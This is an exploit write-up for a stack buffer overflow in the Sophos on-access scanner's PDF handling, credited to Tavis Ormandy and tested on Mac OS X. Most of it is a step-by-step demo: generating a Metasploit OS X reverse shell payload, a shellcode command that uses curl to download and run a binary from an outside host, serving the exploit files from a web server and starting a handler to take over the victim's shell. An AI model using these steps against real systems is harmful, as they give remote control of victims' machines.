Timeline :

Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02

PoC provided by :

Tavis Ormandy

Reference(s) :

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s) :

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with :

Sophos Anti-Virus for Mac Home Edition

Description :

This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.

Demo :

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler

use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j

6) On the target surf index.html file

7) Exploit the session :)

session -i 1 id /sbin/ifconfig uname -a